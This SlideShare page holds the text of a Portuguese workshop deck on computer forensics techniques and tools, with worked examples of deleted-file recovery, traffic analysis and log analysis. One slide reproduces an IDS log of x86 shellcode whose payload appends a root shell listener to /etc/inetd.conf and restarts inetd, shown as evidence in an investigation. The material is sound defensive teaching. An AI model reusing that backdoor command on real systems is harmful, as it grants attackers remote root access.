Técnicas e Ferramentas paraAnálise Forense ComputacionalRafael Soares FerreiraClavis Segurança da Informaçãorafael@clavis....
$ whoami Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• CSO (Clavis & Green Hat)• Pentest...
Agenda Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Técnicas• Ferramentas• Exemplos• Dú...
Início... Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.Plano de Investigação      ✔ Sinto...
Coleta de Dados Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Princípio de Locard• Persi...
Live Analysis Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Processos e Conexões• Memóri...
Correlação Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Juntos e Misturados!• Linha do ...
Tópicos Relacionados Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Análise de Artefatos•...
Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Identificação de rootkits:    ...
Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Cópia remota:    nc, ssh• Conf...
Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Atividade de usuários:     w, ...
Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Propriedades de arquivos:     ...
Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Windows    Sysinternals• Estag...
Exemplos Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Arquivo Apagado• Tráfego de Rede•...
Arquivo Apagado Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Autopsy (File Analysis)  ...
Arquivo Apagado Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Autopsy (Data Unit)      ...
Tráfego de Rede Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Comando Identificado ●   ...
Tráfego de Rede    Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.●   Arquivo Transferido  ...
Tráfego de Rede    Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.●   Análise do Arquivo Ca...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Log do IDS    Nov 7 23:11...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Timeline                 ...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Recuperação de Arquivo Ap...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Rootkit Identificado     ...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Análise de Artefatos     ...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Arquivo de Instalação Ide...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Análise dos Logs         ...
Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Recuperação dos Logs Apag...
Dúvidas? Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.                                   ...
Fim... Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.                          Muito Obrig...
Upcoming SlideShare
Loading in …5
×

Workshop Análise Forense Computacional - Clavis Segurança da Informação && Riosoft

1,839 views
1,756 views

Published on

O workshop será composto por três palestras. Duas tendo como objetivo de transmitir conhecimento técnico da área e de itens relacionados ao mercado corporativo; e a terceira, transmitir informações sobre a profissão de Perito Criminal Federal na área de Informática.
http://www.clavis.com.br
http://www.blog.clavis.com.br

Published in: Technology
1 Comment
7 Likes
Statistics
Notes
No Downloads
Views
Total views
1,839
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
1
Likes
7
Embeds 0
No embeds

No notes for slide

Workshop Análise Forense Computacional - Clavis Segurança da Informação && Riosoft

  1. 1. Técnicas e Ferramentas paraAnálise Forense ComputacionalRafael Soares FerreiraClavis Segurança da Informaçãorafael@clavis.com.br Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  2. 2. $ whoami Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• CSO (Clavis & Green Hat)• Pentester• Investigador Forense• Incident Handler• Hacker Ético (CEHv6 – ecc943687)• Instrutor e Palestrante Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  3. 3. Agenda Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Técnicas• Ferramentas• Exemplos• Dúvidas Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  4. 4. Início... Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.Plano de Investigação ✔ Sintomas ✔ Objetivos ✔ Indicadores de Sucesso ✔ Perguntas a Serem Respondidas Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  5. 5. Coleta de Dados Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Princípio de Locard• Persistência dos Dados• “Anômalo”, “Anormal”, “Suspeito”...• Documentação: O que? Como? Porque? Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  6. 6. Live Analysis Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Processos e Conexões• Memória RAM ➔ Chaves Criptográficas ➔ Bibliotecas Carregadas ➔ Programas em execução ➔ Strings Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  7. 7. Correlação Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Juntos e Misturados!• Linha do tempo• Contextualização• Invasão => Impacto => Evasão Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  8. 8. Tópicos Relacionados Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Análise de Artefatos• Captura / Análise de Tráfego• Criptoanálise• Esteganografia Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  9. 9. Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Identificação de rootkits: chkrootkit• Dump da memória: memdump, xwd• Cópia de mídias: dd, dcfldd Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  10. 10. Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Cópia remota: nc, ssh• Configurações da rede: ifconfig, iwconfig, route, arp, netstat• Tráfego de rede: wireshark, xplico, ngrep, tcpxtract Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  11. 11. Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Atividade de usuários: w, who, last, lastlog• Processos: ps• Kernel e módulos: uname, lsmod Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  12. 12. Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Propriedades de arquivos: stat• Análise de dados strings, grep• Análise de binários suspeitos nm, ldd, hexdump, objdump Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  13. 13. Ferramentas Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Windows Sysinternals• Estaganografia stegdetect, outguess, steghide•Ferramentas para análise: Sleuthkit, Autopsy, Foremost Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  14. 14. Exemplos Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.• Arquivo Apagado• Tráfego de Rede• Análise de Logs Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  15. 15. Arquivo Apagado Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Autopsy (File Analysis) Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  16. 16. Arquivo Apagado Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Autopsy (Data Unit) Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  17. 17. Tráfego de Rede Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Comando Identificado ● Conexão ftp iniciada ● Transferência de arquivo ● ((4 << 8) | 56) → Porta 1080 Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  18. 18. Tráfego de Rede Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.● Arquivo Transferido Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  19. 19. Tráfego de Rede Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.● Análise do Arquivo Capturado Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  20. 20. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Log do IDS Nov 7 23:11:51 lisa snort[1260]: IDS362 - MISC - Shellcode X86 NOPS-UDP: 216.216.74.2:710 -> 172.16.1.107:871 11/07-23:11:50.870124 216.216.74.2:710 -> 172.16.1.107:871 UDP TTL:42 TOS:0x0 ID:16143 Len: 456 3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >............... 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 ................ . . . . . . 8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@... B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e 63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >> 20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in 65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  21. 21. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Timeline Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  22. 22. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Recuperação de Arquivo Apagado Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  23. 23. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Rootkit Identificado Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  24. 24. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Análise de Artefatos Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  25. 25. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Arquivo de Instalação Identificado Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  26. 26. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Análise dos Logs Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  27. 27. Análise de Logs Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados.>> Recuperação dos Logs Apagados Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  28. 28. Dúvidas? Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados. Perguntas? Críticas? Sugestões? Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.
  29. 29. Fim... Copyright © 2009 Clavis Segurança da Informação. Todos os direitos reservados. Muito Obrigado! Rafael Soares Ferreira rafael@clavis.com.br @rafaelsferreira Copyright © 2011 Clavis Segurança da Informação. Todos os direitos reservados.

×